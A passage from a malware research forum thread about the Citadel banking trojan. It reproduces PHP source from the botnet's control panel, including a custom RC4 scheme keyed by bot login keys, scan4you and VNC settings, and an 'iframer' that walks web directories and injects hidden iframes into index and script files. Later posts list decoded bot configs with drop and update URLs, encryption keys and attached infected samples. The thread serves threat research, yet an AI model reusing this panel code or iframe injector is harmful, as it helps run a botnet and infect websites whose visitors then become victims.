  $s = mb_strlen($data);
  if($s < $min_size || $s > $max_size)return NULL;
  return $data;
}

/*
  Подключение к базе и установка основных параметров.
  
  Return - bool, true - в случуи успеха, false в случаи ошибки.
*/
function connectToDb($persistent = false)
{
	if (!$persistent){
	  if(!@mysql_connect($GLOBALS['config']['mysql_host'], $GLOBALS['config']['mysql_user'], $GLOBALS['config']['mysql_pass']))
		  return FALSE;
	} else {
		if (!@mysql_pconnect($GLOBALS['config']['mysql_host'], $GLOBALS['config']['mysql_user'], $GLOBALS['config']['mysql_pass']))
			return FALSE;
	}
  if (!@mysql_query('SET NAMES \''.MYSQL_CODEPAGE.'\' COLLATE \''.MYSQL_COLLATE.'\''))
	  return FALSE;
  if (!@mysql_select_db($GLOBALS['config']['mysql_db']))
	  return FALSE;
  return true;
}

/*
  Выполнение MySQL запроса, с возможностью автоматического восттановления поврежденной таблицы.
  Функция актуальна только для MyISAM.
  
  IN $table - название таблицы.
  IN $query - запрос.
  
  Return    - заначение согласно mysql_query().
*/
function mysqlQueryEx($table, $query)
{
  $r = @mysql_query($query); 
  if($r === false)
  {
    $err = @mysql_errno();
    if(($err === 145 || $err === 1194) && @mysql_query("REPAIR TABLE `{$table}`") !== false)$r = @mysql_query($query); 
  }
  return $r;
}

/*
  Инициализация RC4 ключа.
  
  IN $key - string, текстовый ключ.
  Return  - array, бинарный ключ.
*/
function rc4Init($key)
{
  $hash      = array();
  $box       = array();
  $keyLength = strlen($key);
  
  for($x = 0; $x < 256; $x++)
  {
    $hash[$x] = ord($key[$x % $keyLength]);
    $box[$x]  = $x;
  }

  for($y = $x = 0; $x < 256; $x++)
  {
    $y       = ($y + $box[$x] + $hash[$x]) % 256;
    $tmp     = $box[$x];
    $box[$x] = $box[$y];
    $box[$y] = $tmp;
  }
  
  $magicKey = pack("V", BO_CRYPT_SALT);
  $magicKeyLen = strlen($magicKey);
  
  for($y = $x = 0; $x < 256; $x++)
  {
    $magicKeyPart1 = ord($magicKey[$y])  & 0x07;
    $magicKeyPart2 = ord($magicKey[$y]) >> 0x03;
    if (++$y == $magicKeyLen) $y = 0;

    switch ($magicKeyPart1){
      case 0: $box[$x]  = ~$box[$x]; break;
      case 1: $box[$x] ^= $magicKeyPart2; break;
      case 2: $box[$x] += $magicKeyPart2; break;
      case 3: $box[$x] -= $magicKeyPart2; break;
      case 4: $box[$x]  = $box[$x] >> ($magicKeyPart2%8) | ($box[$x] << (8-($magicKeyPart2%8))); break;
      case 5: $box[$x]  = $box[$x] << ($magicKeyPart2%8) | ($box[$x] >> (8-($magicKeyPart2%8))); break;
      case 6: $box[$x] += 1; break;
      case 7: $box[$x] -= 1; break;
    }
    $box[$x] = $box[$x] & 0xFF;
  }

  return $box;
}

/*
  Широфвание RC4.
  
  IN OUT $data - string, данные для шифрования.
  IN $key      - string, ключ шифрования от rc4Init().
*/
function rc4(&$data, $key)
{
  $len = strlen($data);
  $loginKey = BO_LOGIN_KEY;
  $loginKeyLen = strlen(BO_LOGIN_KEY);
  for($z = $y = $x = $w = 0; $x < $len; $x++)
  {
    $z = ($z + 1) % 256;
    $y = ($y + $key[$z]) % 256;
    $tmp      = $key[$z];
    $key[$z]  = $key[$y];
    $key[$y]  = $tmp;
    $data[$x] = chr(ord($data[$x]) ^ ($key[(($key[$z] + $key[$y]) % 256)]));
    $data[$x] = chr(ord($data[$x]) ^ ord($loginKey[$w]));
    if (++$w == $loginKeyLen) $w = 0;
  }
}

/*
  Визуальное шифрование.
  
  IN OUT $data - string, данные для шифрования.
*/
function visualEncrypt(&$data)
{
  $len = strlen($data);
  for($i = 1; $i < $len; $i++)$data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));
}

/*
  Визуальное дешифрование.
  
  IN OUT $data - string, данные для шифрования.
*/
function visualDecrypt(&$data)
{
  $len = strlen($data);
  if($len > 0)for($i = $len - 1; $i > 0; $i--)$data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));
}

/*
  Создание директории, включая весь путь.
  
  IN $dir - string, директория.
*/
function createDir($dir)
{
  $ll = explode('/', str_replace('\\', '/', $dir));
  $cur = '';
  
  foreach($ll as $d)if($d != '..' && $d != '.' && strlen($d) > 0)
  {
    $cur .= $d.'/';
    if(!is_dir($cur) && !@mkdir($cur, 0777))return false;
  }
  return true;
}

function config_gefault_values(){
	return array(
		'mysql_host' => '127.0.0.1',
		'mysql_user' => '',
		'mysql_pass' => '',
		'mysql_db' => '',

		'reports_path' => '_reports',
		'reports_to_db' => 0,
		'reports_to_fs' => 0,
		'reports_geoip' => 0,

		'jabber' => array('login' => '', 'pass' => '', 'host' => '', 'port' => 5222),

		'reports_jn' => 0,
		'reports_jn_logfile' => '',
		'reports_jn_to' => '',
		'reports_jn_list' => '',
		'reports_jn_botmasks' => '',
		'reports_jn_masks' => array('wentOnline' => '', 'software' => '', 'cmd' => ''),
		'reports_jn_script' => '',

		'scan4you_jid' => '',
		'scan4you_id' => '',
		'scan4you_token' => '',

		'accparse_jid' => '',
		'vnc_server' => '',
		'vnc_notify_jid' => '',

		'reports_deduplication' => 1,

		'iframer' => array(
			'url' => '',
			'html' => '<iframe src="http://example.com/" width=1 height=1 style="visibility: hidden"></iframe>',
			'mode' => 'off', # off | checkonly | inject | preview
			'inject' => 'smart', # smart | append | overwrite
			'traverse' => array(
				'depth' => 3,
				'dir_masks' => array('*www*', 'public*', 'domain*', '*host*', 'ht*docs', '*site*', '*web*'),
				'file_masks' => array('index.*', '*.js', '*.htm*'),
				),
			'opt' => array(
				'reiframe_days' => 0,
				'process_delay' => 0,
				),
			),

		'named_preset' => array(),
		'db-connect' => array(),

        'mailer' => array(
            'master_email' => '',
            'script_url' => '',
        ),

		'allowed_countries_enabled' => 0,
		'allowed_countries' => '',

		'botnet_timeout' => 0,
		'botnet_cryptkey' => '',
		);
	}

/*
  Обналвения файла конфигурации.
  
  IN $updateList - array, список для обналвения.
  
  Return - true - в случаи успеха,
           false - в случаи ошибки.
*/
function updateConfig($updateList){
	//Пытаемся дать себе права.
	$file    = defined('FILE_CONFIG') ? FILE_CONFIG : 'system/config.php';
	$oldfile = $file.'.old.php';

	@chmod(@dirname($file), 0777);
	@chmod($file,           0777);
	@chmod($oldfile,        0777);

	//Удаляем старый файл.
	@unlink($oldfile);

	//переименовывем текущий конфиг.
	if(is_file($file) && !@rename($file, $oldfile))
		return false;

	# Defaults
	$defaults = config_gefault_values();

	# Collect values
	$write_config = array();
	foreach (array_keys($defaults) as $key)
		if (isset($updateList[$key]))
			$write_config[$key] = $updateList[$key];
		elseif (isset($GLOBALS['config'][$key]))
			$write_config[$key] = $GLOBALS['config'][$key];
		else
			$write_config[$key] = $defaults[$key];

	# Format
	# Update the binary cryptkey
	$cryptkey_bin = md5(BO_LOGIN_KEY, true);
	rc4($cryptkey_bin, rc4Init($write_config['botnet_cryptkey']));
	$cryptkey_bin = rc4Init($cryptkey_bin);

	$cfgData = "<?php\n\$config = ".var_export($write_config, 1).";\n";
	$cfgData .= "\$config['botnet_cryptkey_bin'] = array(".implode(', ', $cryptkey_bin).");\n";
	$cfgData .= "return \$config;\n";

	# Store
	if(@file_put_contents($file, $cfgData) !== strlen($cfgData))
		return false;

    # Reload
    $GLOBALS['config'] = $write_config;
    
	return true;
	}
Found also a decoded config on google, no idea who did it but it's some clean work :)
Code: Select all
Drop: gilbrandao.com.br/admin/cd/jesu/file.php
Key: FF CC 0E 0F 18 F8 79 7B 11 43 EC EB 8E 88 2B 29
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Attachments
infected
(663.31 KiB) Downloaded 77 times
 #21446  by Xylitol
 Mon Nov 25, 2013 10:46 am
1.3.5.1 targeting Kingdom of Saudi Arabia, Australia, Portugal, Finland, Denmark, United Kingdom, Brazil, liberty reserve, facebook...
Courtesy of kafeine.
Code: Select all
Drop: hxtp://valentine.su/test/lfdxwp3.php
Update: hxtp://valentine.su/test/file.php|file=file.dll
Key: 1F F6 17 62 9E FA 4C EE 8F E6 C2 29 49 51 2E 3B
Login key: 2D5523342D4ACB20E85CABB46C86C339
John Doe 21
Image
https://zeustracker.abuse.ch/monitor.ph ... lentine.su
Fastflux and MiTB webinjs.
Code: Select all
hxtps://anl.su/george/admin.php
hxtps://anl.su/george/install.php
Alot of different citadel keys these days, looks like the microsoft heat is gone, people start again doing business with Citadel.
Attachments
infected
(41.13 KiB) Downloaded 70 times
  • 1
  • 9
  • 10
  • 11
  • 12
  • 13
  • 20